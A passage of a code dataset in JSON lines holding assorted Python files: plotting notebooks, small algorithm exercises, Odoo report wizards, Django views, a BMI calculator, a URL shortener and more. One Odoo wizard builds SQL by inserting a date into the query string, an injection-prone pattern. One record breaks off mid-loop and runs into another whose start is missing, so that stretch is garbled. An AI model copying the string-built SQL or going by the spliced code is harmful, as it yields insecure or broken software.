sys.exit(1)\n os.remove(tmp)\n with open(fname, 'r') as f:\n line = f.read()\n with open(fname, 'w') as f:\n f.write('# TEST %s 0\\n' % repr)\n for _ in xrange(5):\n test = random.randint(0, base ** length - 1)\n repr = dary_repr(test, base, length)\n if test != secret:\n f.write('# TEST %s 1\\n' % repr)\n f.write(line)\n\ndef main(argv):\n parser = argparse.ArgumentParser()\n parser.add_argument('--cryfsm', metavar='PATH', action='store', type=str,\n default='cryfsm',\n help='set PATH as cryfsm executable')\n parser.add_argument('--fsmevade', metavar='PATH', action='store', type=str,\n default='cryfsm',\n help='set PATH as fsmevade executable')\n parser.add_argument('base', action='store', type=int)\n parser.add_argument('length', action='store', type=int)\n args = parser.parse_args()\n point(args.base, args.length, args.cryfsm, args.fsmevade)\n\nif __name__ == '__main__':\n try:\n main(sys.argv)\n except KeyboardInterrupt:\n pass\n","repo_name":"0wnrepo/obfuscation","sub_path":"circuits/point-json.py","file_name":"point-json.py","file_ext":"py","file_size_in_byte":2196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"67"} +{"seq_id":"18806692842","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Mapas Choropleth \n\n# ## Uso do Plotly Offline\n\n# Importe configure tudo para trabalhar offline.\n\n# In[9]:\n\n\nimport plotly.plotly as py\nimport plotly.graph_objs as go \nfrom plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot\n\n\n# Agora configure tudo para que os as figuras apareçam no notebook:\n\n# In[10]:\n\n\ninit_notebook_mode(connected=True) \n\n\n# Mais informações sobre como usar o Plotly Offline podem ser encontradas [aqui](https://plot.ly/python/offline/).\n\n# ## Choropleth US Maps\n# \n# O mapeamento da Plotly pode ser um pouco difícil de se acostumar no início, lembre-se de consultar o arquiv pdf na pasta de visualização de dados, ou [encontrá-la aqui em linha](https://images.ploots.ly/plotly-documentation/images/ python_cheat_sheet.pdf).\n\n# In[11]:\n\n\nimport pandas as pd\n\n\n# Agora precisamos começar a construir o nosso dicionário de dados. A maneira mais fácil de fazer isso é usar a função ** dict () ** da forma geral:\n# \n# * type = 'choropleth',\n# * locations = Lista de estados\n# * locationmode = 'estados-USA'\n# * colorscale= \n# \n# Ou uma seqüência predefinida:\n# \n# 'pairs' | 'Greys' | 'Greens' | 'Bluered' | 'Hot' | 'Picnic' | 'Portland' | 'Jet' | 'RdBu' | 'Blackbody' | 'Earth' | 'Electric' | 'YIOrRd' | 'YIGnBu'\n# \n# ou crie uma [escala de cores personalizada](https://plot.ly/python/heatmap-and-contour-colorscales/)\n# \n# * text= lista ou matriz de texto para exibição por ponto\n# * z= matriz de valores no eixo z (cor do estado)\n# * colorbar = {'title':'Título da barra de cores'})\n# \n# Aqui está um exemplo simples:\n\n# In[12]:\n\n\ndata = dict(type = 'choropleth',\n locations = ['AZ','CA','NY'],\n locationmode = 'USA-states',\n colorscale= 'Portland',\n text= ['Texto1','Texto2','Texto3'],\n z=[1.0,2.0,3.0],\n colorbar = {'title':'Título da barra de cores'})\n\n\n# Em seguida, criamos o dicionário de layout aninhado:\n\n# In[13]:\n\n\nlayout = dict(geo = {'scope':'usa'})\n\n\n# Então usamos:\n# \n# go.Figure(data = [data],layout = layout)\n# \n# para configurar o objeto que finalmente é transmitido para iplot ()\n\n# In[14]:\n\n\nchoromap = go.Figure(data = [data],layout = layout)\n\n\n# In[15]:\n\n\niplot(choromap)\n\n\n# ### Dados reais: Mapa dos EUA Choropleth\n# \n# Agora vamos mostrar um exemplo com alguns dados reais, bem como algumas outras opções que podemos adicionar aos dicionários em dados e layout.\n\n# In[16]:\n\n\ndf = pd.read_csv('2011_US_AGRI_Exports')\ndf.head()\n\n\n# Agora criamos um dicionário de dados com alguns argumentos adicionais e argumentos de barras de cores:\n\n# In[22]:\n\n\ndata = dict(type='choropleth',\n colorscale = 'YIOrRd',\n locations = df['code'],\n z = df['total exports'],\n locationmode = 'USA-states',\n text = df['text'],\n marker = dict(line = dict(color = 'rgb(255,255,255)',width = 2)),\n colorbar = {'title':\"Milhões de dólares\"}\n ) \n\n\n# E nosso dicionário de layout com mais alguns argumentos:\n\n# In[23]:\n\n\nlayout = dict(title = '2011 Exportações de Agricultura dos EUA por Estado',\n geo = dict(scope='usa',\n showlakes = True,\n lakecolor = 'rgb(85,173,240)')\n )\n\n\n# In[24]:\n\n\nchoromap = go.Figure(data = [data],layout = layout)\n\n\n# In[25]:\n\n\niplot(choromap)\n\n\n# # Mapa-mundi Choropleth\n# \n# Agora vamos ver um exemplo com um Mapa Mundial:\n\n# In[26]:\n\n\ndf = pd.read_csv('2014_World_GDP')\ndf.head()\n\n\n# In[27]:\n\n\ndata = dict(\n type = 'choropleth',\n locations = df['CODE'],\n z = df['GDP (BILLIONS)'],\n text = df['COUNTRY'],\n colorbar = {'title' : 'GDP Billions US'},\n ) \n\n\n# In[28]:\n\n\nlayout = dict(\n title = '2014 Global GDP',\n geo = dict(\n showframe = False,\n projection = {'type':'Mercator'}\n )\n)\n\n\n# In[29]:\n\n\nchoromap = go.Figure(data = [data],layout = layout)\niplot(choromap)\n\n","repo_name":"masbahnana/Workshop-ciencia-de-dados","sub_path":"3. Visualização de dados/Geographical Plotting/Mapas Choropleth.py","file_name":"Mapas Choropleth.py","file_ext":"py","file_size_in_byte":4007,"program_lang":"python","lang":"pt","doc_type":"code","stars":30,"dataset":"github-code","pt":"67"} +{"seq_id":"74648464534","text":"def solution(answers):\n answer = []\n one = [1,2,3,4,5]\n two = [2,1,2,3,2,4,2,5]\n three = [3,3,1,1,2,2,4,4,5,5]\n \n score = [0,0,0]\n \n for i, ans in enumerate(answers):\n if ans == one[i%5]:\n score[0] += 1\n if ans == two[i%8]:\n score[1] += 1\n if ans == three[i%10]:\n score[2] += 1\n \n max_v = max(score)\n for i, sc in enumerate(score):\n if sc == max_v:\n answer.append(i + 1)\n \n return answer","repo_name":"unhhyyeexx/ProblemSolving","sub_path":"프로그래머스/lv1/42840. 모의고사/모의고사.py","file_name":"모의고사.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"26786440648","text":"#ELIF ES AGREGAR UNA TERCERA U OTRA OPCION A LA CADENA IF/ELSE\r\n\r\nedad = 66\r\n\r\nif edad >= 18 and edad < 65 :\r\n print(\"Eres mayor de edad\")\r\nelif edad >= 65 :\r\n print(\"Eres un adulto mayor\")\r\nelse:\r\n print(\"Eres menor de edad\")\r\n\r\n#FOR INDICA LA CANTIDAD DE VECES QUE QUIERO QUE SE REALIZE LA FUNCION\r\n#WHILE INDICA QUE SE REPETIRA HASTA QUE SE CUMPLA LA CONDICION\r\n\r\nnum = 0\r\n\r\nwhile num <= 100 :\r\n print(num)\r\n num += 2\r\n\r\n#SI UTILIZO CICLO INFINITO = CTRL + C PARA DETENER EL PROCESO / O CERRAR TOD0!!!!\r\n\r\n#NO IMPRIMIR\r\n\r\n#while True :\r\n # print(num)\r\n # num += 2\r\n\r\n#WHILE TAMBIEN SE PUEDE COMBINAR CON ELSE/IF\r\n\r\nwhile num <= 100 :\r\n print(num)\r\n num += 2\r\nelse :\r\n print(\"MI condicion es igual o mayor a cien\")\r\n\r\n#BREAK ME CERRARA EL COMANDO WHILE\r\n\r\nwhile True :\r\n parametro = input(\">\")\r\n if parametro == \"exit\" :\r\n break\r\n else :\r\n print(parametro) #ESTE LOOP PIDE PALABRAS PARA IMPRIMIRLAS, HASTA QUE EL USUARIO INGRESE LA PALABRA CLAVE, EN ESTE CASO EXIT\r\n\r\n#== ME COMPARA / = ME ASIGNA / PARA IF/ELSE CON VARIABLES TRUE/FALSE SE USA = PARA ASIGNARLE Y NO COMPARAR; ESTO PARA TRUE Y FALSE","repo_name":"Saimon01XD/programacion-icinif","sub_path":"PythonProgramacion/Clases/04-Condicionales.py","file_name":"04-Condicionales.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"43559989381","text":"from numpy import *\nfrom numpy.linalg import *\n\nprint(\"THIS IS A PROGRAM TO SOLVE A SYSTEM OF LINEAR EQUATIONS USING THE GAUSSIAN ELIMINATION METHOD\")\n\ndef gauss(A,b):\n A_new = A.copy()\n b= b.transpose()\n C = column_stack((A_new,b))\n if C[1,0] != 0:\n mult_1 = C[1,0]/C[0,0]\n C[1] = C[1] - (mult_1 * C[0])\n if C[2,0] !=0:\n mult_2 = C[2,0]/C[0,0]\n C[2] = C[2] - (mult_2 * C[0])\n if C[2,1] !=0:\n mult_3 = C[2,1]/C[1,1]\n C[2] = C[2] - (mult_3 * C[1])\n\n b_new = C[...,3]\n C = delete(C, 3, axis=1)\n x = dot(inv(C),b_new)\n print(\"After the forward elimination, the result is: \")\n print(\"A: \")\n print (C)\n print(\"b: \")\n print (b_new)\n\n \n\n return x\n\n\nA = array([[5, -2, 3], [-3, 9, 1], [2, -1, -7]], float)\nb = array([-1,2,3], float)\n\nx = gauss(A,b)\n\nprint(\"A: \")\nprint(A)\n\nprint(\"b: \")\nprint(b)\n\nprint(\"X: \")\nprint(x)\n","repo_name":"prismathic/numerical_algorithms","sub_path":"my_gauss.py","file_name":"my_gauss.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"74344269652","text":"import time\nfrom datetime import datetime\nfrom openerp import api, fields, models, _\nimport openerp.addons.decimal_precision as dp\nfrom dateutil.relativedelta import relativedelta\nfrom openerp.exceptions import UserError\n\n\nclass ContractCashIn(models.TransientModel):\n _name = \"contract.cash.in\"\n _description = \"Contract Cash In\"\n\n product_id = fields.Many2one('product.product', '产品', required=True)\n end_date = fields.Date('截止日期', required=True,\n default=lambda *a: time.strftime('%Y-%m-%d'))\n cash = fields.Boolean('头寸')\n\n @api.multi\n def make_report(self):\n product_id = self.product_id.id\n end_date = self.end_date\n cash = self.cash\n report_data = self.env['linyan.contract'].search_read([('product_id', '=', product_id), ('contract_date', '<=', end_date), ('cash', '=', cash), (\n 'state', '!=', 'cancel'), ('buy', '=', True)], ['partner_id', 'product_id', 'year', 'month', 'contract_name', 'actual_qty', 'price', 'amount', 'cash'])\n values = []\n for data in report_data:\n partner_id = data['partner_id'][0]\n product_id = data['product_id'][0]\n year = data['year']\n month = data['month']\n contract_name = data['contract_name']\n actual_qty = data['actual_qty']\n price = data['price']\n amount = data['amount']\n cash = data['cash']\n values.append({\n 'partner_id': partner_id,\n 'product_id': product_id,\n 'year': year,\n 'month': month,\n 'contract_name': contract_name,\n 'actual_qty': actual_qty,\n 'price': price,\n 'amount': amount,\n 'cash': cash})\n self._cr.execute(\"delete from linyan_cash_report\")\n res_ids = []\n for val in values:\n report = self.env['linyan.cash.report'].create(val)\n res_ids.append(report.id)\n name = '空头买入'\n if cash:\n name = '头寸买入'\n return {\n 'type': 'ir.actions.act_window',\n 'name': name,\n 'view_type': 'form',\n 'view_mode': 'tree',\n 'res_model': 'linyan.cash.report',\n 'res_id': res_ids\n }\n\n\nclass ContractCashOut(models.TransientModel):\n _name = \"contract.cash.out\"\n _description = \"Contract Cash Out\"\n\n product_id = fields.Many2one('product.product', '产品', required=True)\n end_date = fields.Date('截止日期', required=True,\n default=lambda *a: time.strftime('%Y-%m-%d'))\n cash = fields.Boolean('头寸')\n\n @api.multi\n def make_report(self):\n product_id = self.product_id.id\n end_date = self.end_date\n cash = self.cash\n report_data = self.env['linyan.contract'].search_read([('product_id', '=', product_id), ('contract_date', '<=', end_date), ('cash', '=', cash), (\n 'state', '!=', 'cancel'), ('buy', '=', False)], ['partner_id', 'product_id', 'year', 'month', 'contract_name', 'actual_qty', 'price', 'amount', 'cash'])\n values = []\n for data in report_data:\n partner_id = data['partner_id'][0]\n product_id = data['product_id'][0]\n year = data['year']\n month = data['month']\n contract_name = data['contract_name']\n actual_qty = data['actual_qty']\n price = data['price']\n amount = data['amount']\n cash = data['cash']\n values.append({\n 'partner_id': partner_id,\n 'product_id': product_id,\n 'year': year,\n 'month': month,\n 'contract_name': contract_name,\n 'actual_qty': actual_qty,\n 'price': price,\n 'amount': amount,\n 'cash': cash})\n self._cr.execute(\"delete from linyan_cash_report\")\n res_ids = []\n for val in values:\n report = self.env['linyan.cash.report'].create(val)\n res_ids.append(report.id)\n name = '空头卖出'\n if cash:\n name = '头寸卖出'\n return {\n 'type': 'ir.actions.act_window',\n 'name': name,\n 'view_type': 'form',\n 'view_mode': 'tree',\n 'res_model': 'linyan.cash.report',\n 'res_id': res_ids\n }\n\n\nclass MoveQuantity(models.TransientModel):\n _name = \"move.quantity\"\n\n product_id = fields.Many2one('product.product', '产品', required=True)\n end_date = fields.Date('截止日期', required=True, default=lambda *a: time.strftime('%Y-%m-%d'))\n\n @api.multi\n def make_report(self):\n cr = self._cr\n product_id = self.product_id.id\n end_date = (datetime.strptime(self.end_date, \"%Y-%m-%d\") + relativedelta(days=1)).strftime('%Y-%m-%d')\n move_in = self.env['logistics.move'].search([('product_id', '=', product_id), ('date_done', '<', end_date), ('state', '=', 'done'), ('move_out', '=', False), ('move_in', '=', True)])\n in_datas = []\n if move_in.ids:\n cr.execute(\"select lm.warehouse_dest_id as warehouse_id, lm.product_id, lc.make_company, lc.supplierinfo_id, sum(lm.actual_qty) as actual_qty from logistics_move lm left join linyan_contract lc on lm.contract_id = lc.id where lm.id in %s group by lm.warehouse_dest_id, lm.product_id, lc.make_company, lc.supplierinfo_id\", (tuple(move_in.ids),))\n in_datas = cr.dictfetchall()\n new_in_datas = {}\n for idt in in_datas:\n k = '-'.join([str(idt['warehouse_id']) or '0', idt['make_company'] or '', str(idt['supplierinfo_id']) or '0'])\n new_in_datas.update({k: idt})\n move_out = self.env['logistics.move'].search([('product_id', '=', product_id), ('date_done', '<', end_date), ('state', '=', 'done'), ('move_out', '=', True), ('move_in', '=', False)])\n out_datas = []\n if move_out.ids:\n cr.execute(\"select lm.warehouse_src_id as warehouse_id, lm.product_id, lc.make_company, lc.supplierinfo_id, sum(lm.actual_qty) as actual_qty from logistics_move lm left join linyan_contract lc on lm.contract_id = lc.id where lm.id in %s group by lm.warehouse_src_id, lm.product_id, lc.make_company, lc.supplierinfo_id\", (tuple(move_out.ids),))\n out_datas = cr.dictfetchall()\n new_out_datas = {}\n for odt in out_datas:\n k = '-'.join([str(odt['warehouse_id']) or '0', odt['make_company'] or '', str(odt['supplierinfo_id']) or '0'])\n new_out_datas.update({k: odt})\n quantity_datas = []\n in_lists = list(set(new_in_datas).difference(set(new_out_datas)))\n for il in in_lists:\n quantity_datas.append(new_in_datas[il])\n out_lists = list(set(new_out_datas).difference(set(new_in_datas)))\n for ol in out_lists:\n quantity_out_datas = new_out_datas[ol].copy()\n quantity_out_datas.update({'actual_qty': -new_out_datas[ol]['actual_qty']})\n quantity_datas.append(quantity_out_datas)\n inter_lists = list(set(new_in_datas) & set(new_out_datas))\n for intl in inter_lists:\n actual_qty = new_in_datas[intl]['actual_qty'] - new_out_datas[intl]['actual_qty']\n quantity_inter_datas = new_in_datas[intl].copy()\n quantity_inter_datas.update({'actual_qty': actual_qty})\n quantity_datas.append(quantity_inter_datas)\n self._cr.execute(\"delete from move_quantity_report\")\n res_ids = []\n for qty_dt in quantity_datas:\n report = self.env['move.quantity.report'].create(qty_dt)\n res_ids.append(report.id)\n return {\n 'type': 'ir.actions.act_window',\n 'name': '库存报表',\n 'view_type': 'form',\n 'view_mode': 'tree',\n 'res_model': 'move.quantity.report',\n 'res_id': res_ids\n }\n\n\nclass LinyanMakeInvoice(models.TransientModel):\n _name = \"linyan.make.invoice\"\n\n end_date = fields.Date('截止日期', required=True, default=lambda *a: time.strftime('%Y-%m-%d'))\n\n @api.multi\n def make_report(self):\n cr = self._cr\n end_date = self.end_date\n cr.execute(\"delete from linyan_invoice_report\")\n cr.execute(\"\"\"select COALESCE(t1.rece_invoice, 0.0) as rece_invoice,\n -1*COALESCE(t2.pay_invoice, 0.0) as pay_invoice,\n -1*COALESCE(t3.rece_payment, 0.0) as rece_payment,\n COALESCE(t4.pay_payment, 0.0) as pay_payment,\n COALESCE(t1.rece_invoice, 0.0)-COALESCE(t3.rece_payment, 0.0)-COALESCE(t2.pay_invoice, 0.0)+COALESCE(t4.pay_payment, 0.0) as amount\n from (select 1 as rel_id, sum(residual) as rece_invoice from linyan_invoice where invoice_type = 'out_invoice'\n and date_invoice < '%s') t1 left join (select 1 as rel_id, sum(residual) as pay_invoice from linyan_invoice\n where invoice_type = 'in_invoice' and date_invoice < '%s') t2 on t1.rel_id = t2.rel_id left join\n (select 1 as rel_id, sum(remaining_amount) as rece_payment from linyan_payment where payment_type = 'inbound'\n and payment_date < '%s') t3 on t1.rel_id = t3.rel_id left join\n (select 1 as rel_id, sum(remaining_amount) as pay_payment from linyan_payment where payment_type = 'outbound'\n and payment_date < '%s') t4 on t1.rel_id = t4.rel_id\"\"\" % (end_date, end_date, end_date, end_date))\n value = cr.dictfetchone()\n if value:\n self.env['linyan.invoice.report'].create(value)\n return {\n 'type': 'ir.actions.act_window',\n 'name': '库存报表',\n 'view_type': 'form',\n 'view_mode': 'tree',\n 'res_model': 'linyan.invoice.report'\n }\n return {'type': 'ir.actions.act_window_close'}\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n","repo_name":"CharlesBird/Resources","sub_path":"odoo/linyan_contract/wizard/contract_make_report.py","file_name":"contract_make_report.py","file_ext":"py","file_size_in_byte":10013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"22996698780","text":"class Solution:\n def RemoveDuplicates_I(self, s: str, k: int) -> str:\n stack = []\n\n for c in s:\n if stack and stack[-1][0] == c:\n stack[-1][1] += 1\n if stack[-1][1] == k:\n stack.pop()\n else:\n stack.append([c, 1])\n ans = \"\"\n for x in stack:\n ans += x[0] * x[1]\n\n return ans\n\n def RemoveDuplicates_II(self,s,k):\n stack = []\n i = 0\n\n while(i datetime(2020, 10, 25, 20, 0, 0)\n voting_in_session = datetime.now() < datetime(2020, 10, 25, 8, 0, 0)\n return render(request, 'web/index.html', {\n 'partners': partners,\n 'voting_not_started': voting_not_started,\n 'voting_ended': voting_ended,\n 'voting_in_session': voting_in_session\n })\n\n\ndef about(request):\n members = OrganizationMember.objects.select_related('group').filter(group__isnull=False).order_by('group__order',\n 'order', 'name')\n\n municipalities_with_members = Municipality.objects.annotate_with_organization_members_count() \\\n .exclude(organization_members_count=0) \\\n .prefetch_related(Prefetch('organization_members', OrganizationMember.objects.order_by('name'))) \\\n .order_by('slug')\n\n return render(request, 'web/about.html', {\n 'members': members,\n 'municipalities_with_members': municipalities_with_members\n })\n\n\ndef join_us(request):\n return render(request, 'web/join-us.html')\n\n\n@require_http_methods([\"POST\"])\ndef subscribe(request):\n form = EmailSubscriptionForm(request.POST)\n try:\n if form.is_valid():\n email = form.cleaned_data['email']\n request_info = get_request_information(request)\n\n EmailSubscription(\n email=email,\n user_ip=request_info.client_ip,\n user_agent=request_info.client_user_agent,\n user_country=request_info.client_country\n ).save()\n else:\n return HttpResponse(status=HTTP_422_UNPROCESSABLE_ENTITY, content='El. paštas neteisingas')\n except IntegrityError:\n return HttpResponse(status=HTTP_409_CONFLICT, content='El. paštas jau registruotas.')\n\n return HttpResponse(status=HTTP_201_CREATED)\n\n\n@login_required\ndef user_profile(request):\n user_questions = Question.objects.filter_questions_by_user_or_for_user(request.user) \\\n .select_related_for_display() \\\n .annotate_with_last_created_at() \\\n .order_by('-last_created_at', 'pk')\n\n error = None\n if request.method == 'POST':\n disconnect_form = DisconnectForm(request.POST, request=request)\n\n if disconnect_form.is_valid():\n disconnect_form.save()\n else:\n error = \"Unable to disconnect social account. Try again.\"\n\n return render(request, 'web/user-profile.html', {\n 'error': error,\n 'user_questions': user_questions\n })\n\n\ndef health_check(request):\n return HttpResponse(\"OK\")\n","repo_name":"zinaukarenku/zkr-platform","sub_path":"web/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3528,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"42373731730","text":"from flectra.addons.event.tests.common import TestEventCommon\nfrom flectra.addons.sales_team.tests.common import TestSalesCommon\n\n\nclass TestEventSaleCommon(TestEventCommon, TestSalesCommon):\n\n @classmethod\n def setUpClass(cls):\n super(TestEventSaleCommon, cls).setUpClass()\n\n cls.event_product = cls.env['product.product'].create({\n 'name': 'Test Registration Product',\n 'description_sale': 'Mighty Description',\n 'list_price': 10,\n 'event_ok': True,\n 'standard_price': 30.0,\n 'type': 'service',\n })\n","repo_name":"flectra-hq/flectra","sub_path":"addons/event_sale/tests/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"67"} +{"seq_id":"32829698025","text":"# Benchmark the simulation\n\nimport sciris as sc\nimport covasim as cv\n\nsim = cv.Sim()\nsim['n_days'] = 180\nto_profile = 'step' # Must be one of the options listed below...currently only 1\n\nfunc_options = {\n 'make_contacts': cv.make_random_contacts,\n 'make_randpop': cv.make_randpop,\n 'person': cv.Person.__init__,\n 'make_people': cv.make_people,\n 'init_people': sim.init_people,\n 'initialize': sim.initialize,\n 'run': sim.run,\n 'step': sim.step,\n}\n\nsc.profile(run=sim.run, follow=func_options[to_profile])\n","repo_name":"bosetinsky/eswatini-covasim","sub_path":"tests/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"74111029993","text":"#!/usr/bin/env python3\n\nfrom litex.gen.fhdl import verilog\nfrom migen import *\n\n# from migen.fhdl import verilog\n\n\nclass Example(Module):\n def __init__(self):\n self.clock_domains += ClockDomain(\"sys\")\n self.s = Signal()\n self.counter = Signal(8)\n x = Array(Signal(name=\"a\") for i in range(7))\n\n myfsm = FSM()\n self.submodules += myfsm\n\n myfsm.act(\n \"FOO\",\n Display(\"FOO norm\"),\n DisplayOnEnter(\"FOO on enter\"),\n self.s.eq(1),\n NextState(\"BAR\"),\n )\n myfsm.act(\n \"BAR\",\n Display(\"BAR norm\"),\n DisplayOnEnter(\"BAR on enter\"),\n self.s.eq(0),\n NextValue(self.counter, self.counter + 1),\n NextValue(x[self.counter], 89),\n NextState(\"FOO\"),\n )\n\n self.be = myfsm.before_entering(\"FOO\")\n self.ae = myfsm.after_entering(\"FOO\")\n self.bl = myfsm.before_leaving(\"FOO\")\n self.al = myfsm.after_leaving(\"FOO\")\n\n\nif __name__ == \"__main__\":\n example = Example()\n print(\n verilog.convert(\n example,\n {example.s, example.counter, example.be, example.ae, example.bl, example.al},\n regular_comb=True,\n )\n )\n","repo_name":"jevinskie/litelitedram","sub_path":"examples/fsm.py","file_name":"fsm.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"1675062312","text":"import traceback\r\nfrom functools import lru_cache\r\n\r\n\r\nclass BMICalculator:\r\n def __init__(self):\r\n # Move to yaml config if required\r\n self.metadata = {\r\n 'CATEGORY_RANGE': [\r\n {'LOW': 0, 'HIGH': 18.4, 'CATEGORY': 'Underweight', 'HEALTHRISK': 'Malnutrition risk'},\r\n {'LOW': 18.5, 'HIGH': 24.9, 'CATEGORY': 'Normal weight', 'HEALTHRISK': 'Low risk'},\r\n {'LOW': 25, 'HIGH': 29.9, 'CATEGORY': 'Overweight', 'HEALTHRISK': 'Enhanced risk'},\r\n {'LOW': 30, 'HIGH': 34.9, 'CATEGORY': 'Moderately obese', 'HEALTHRISK': 'Medium risk'},\r\n {'LOW': 35, 'HIGH': 39.9, 'CATEGORY': 'Severly obese', 'HEALTHRISK': 'High risk'}\r\n ],\r\n 'CATEGORY_MAX': {'LOW': 40, 'CATEGORY': 'Very severly obese', 'HEALTHRISK': 'Very high risk'}\r\n }\r\n\r\n def __str__(self):\r\n return 'Package to compute BMI and category'\r\n\r\n def convert_cm_to_m(self, value):\r\n return value / 100\r\n\r\n def check_zero(self, value):\r\n return True if value > 0 else False\r\n\r\n @lru_cache(maxsize=128)\r\n def calculate_bmi(self, weight, height):\r\n if self.check_zero(weight) and self.check_zero(height):\r\n try:\r\n height_in_meter = self.convert_cm_to_m(height)\r\n bmi = round(weight / (height_in_meter * height_in_meter), 1)\r\n return {'status': True, 'output': bmi}\r\n except:\r\n return {'status': False, 'error': traceback.format_exc()}\r\n else:\r\n return {'status': False, 'error': 'zero value is not acceptable'}\r\n\r\n @lru_cache(maxsize=128)\r\n def get_bmi_category(self, bmivalue):\r\n for category in self.metadata['CATEGORY_RANGE']:\r\n if category['LOW'] <= bmivalue <= category['HIGH']:\r\n return {'CATEGORY': category['CATEGORY'], 'HEALTHRISK': category['HEALTHRISK']}\r\n return {'CATEGORY': self.metadata['CATEGORY_MAX']['CATEGORY'],\r\n 'HEALTHRISK': self.metadata['CATEGORY_MAX']['HEALTHRISK']}\r\n\r\n def calculate_bmi_bulk(self, data):\r\n response = []\r\n for record in data:\r\n this_response = []\r\n if 'Weightkg' in record and 'HeightCm' in record:\r\n bmi_response = self.calculate_bmi(record['Weightkg'], record['HeightCm'])\r\n if bmi_response['status']:\r\n this_response = record\r\n this_response['bmi'] = bmi_response['output']\r\n this_response |= self.get_bmi_category(this_response['bmi'])\r\n else:\r\n print(bmi_response['error'])\r\n else:\r\n print('Either Weightkg or HeightCm or both are missing in', record)\r\n if this_response:\r\n response.append(this_response)\r\n return response\r\n\r\n def get_summary(self, data):\r\n # use pandas for more detailed and complex summary\r\n response = {}\r\n for record in data:\r\n if record['CATEGORY'] not in response:\r\n response[record['CATEGORY']] = 0\r\n response[record['CATEGORY']] += 1\r\n return response\r\n","repo_name":"arulmuruganas/code-20211110-arulmuruganas","sub_path":"BMIPackage/BMICalculator.py","file_name":"BMICalculator.py","file_ext":"py","file_size_in_byte":3191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15101441324","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# kate: space-indent on; indent-width 4; mixedindent off; indent-mode python;\n\nvim = [\n {'name':'common', \n 'mainpackage':True,\n 'shortdesc':'Installs common package for the enhanced vi editor',\n 'packages':['vim', 'vim-doc', 'vim-scripts', 'vim-runtime'],\n 'files': [\n ('vim/vimrc', 'vimrc', 0o0644),\n ],\n 'divert': [\n ('/etc/vim/vimrc', 'vimrc'),\n ]\n },\n {'name':'tiny',\n 'shortdesc':'Installs enhanced vi editor - compact version',\n 'depends':['common'],\n 'side-by-side':['basic', 'tiny', 'gnome', 'cream', 'gtk', 'nox', 'athena'],\n 'packages':['vim-tiny'],\n },\n {'name':'basic',\n 'shortdesc':'Installs enhanced vi editor - basic version',\n 'depends':['common'],\n 'side-by-side':['basic', 'tiny', 'gnome', 'cream', 'gtk', 'nox', 'athena'],\n 'packages':[],\n },\n {'name':'gtk',\n 'shortdesc':'Installs enhanced vi editor - compiled with the GTK2 GUI',\n 'depends':['common'],\n 'side-by-side':['basic', 'tiny', 'gnome', 'cream', 'gtk', 'nox', 'athena'],\n 'packages':['vim-gtk'],\n },\n {'name':'gnome',\n 'shortdesc':'Installs enhanced vi editor - compiled with a GNOME2 GUI',\n 'depends':['common'],\n 'side-by-side':['basic', 'tiny', 'gnome', 'cream', 'gtk', 'nox', 'athena'],\n 'packages':['vim-gnome'],\n },\n {'name':'athena',\n 'shortdesc':'Installs enhanced vi editor - compiled with an Athena GUI',\n 'depends':['common'],\n 'side-by-side':['basic', 'tiny', 'gnome', 'cream', 'gtk', 'nox', 'athena'],\n 'packages':['vim-athena'],\n },\n {'name':'cream',\n 'shortdesc':'Installs enhanced vi editor with VIM macros for beginners',\n 'depends':[('gnome','gtk')],\n 'side-by-side':['basic', 'tiny', 'gnome', 'cream', 'gtk', 'nox', 'athena'],\n 'packages':['cream'],\n },\n {'name':'nox',\n 'shortdesc':'Installs enhanced vi editor without X',\n 'depends':['common'],\n 'side-by-side':['basic', 'tiny', 'gnome', 'cream', 'gtk', 'nox', 'athena'],\n 'packages':['vim-nox'],\n },\n {'name':'none', 'shortdesc':'Uninstalls the enhanced vi editor', 'packages':[] },\n]\n","repo_name":"aroth-arsoft/arsoft-meta-packages","sub_path":"grp_vim.py","file_name":"grp_vim.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32995095278","text":"from django.http import HttpResponse,JsonResponse\nfrom django.shortcuts import render, redirect\n\nfrom urlapp.forms import URLForm\nfrom urlapp.util import checkHash\nfrom .models import URLS\nfrom rest_framework.decorators import api_view\n\n\n# Create your views here.\n\ndef health(request):\n return JsonResponse({'status':'ok'})\n\n@api_view(['POST'])\ndef api(request):\n if request.method == 'POST':\n long_url = request.data['long_url']\n short_url = checkHash(long_url=long_url)\n surl = 'https://web-production-c1d8.up.railway.app/api/'+short_url\n return JsonResponse({\"long_url\":long_url,\"short_url\":surl})\n else:\n return JsonResponse({\"error\":\"Invalid Request\"})\n\n\n \n\n\ndef reroute(request,pk):\n url_data = URLS.objects.get(id=pk)\n return redirect(url_data.long_url)\n \n","repo_name":"nilesh05apr/urlshortner","sub_path":"urlshortner/urlapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30840120135","text":"import numpy as np\nimport torch\nimport torch_sparse as ts\nfrom test_util import 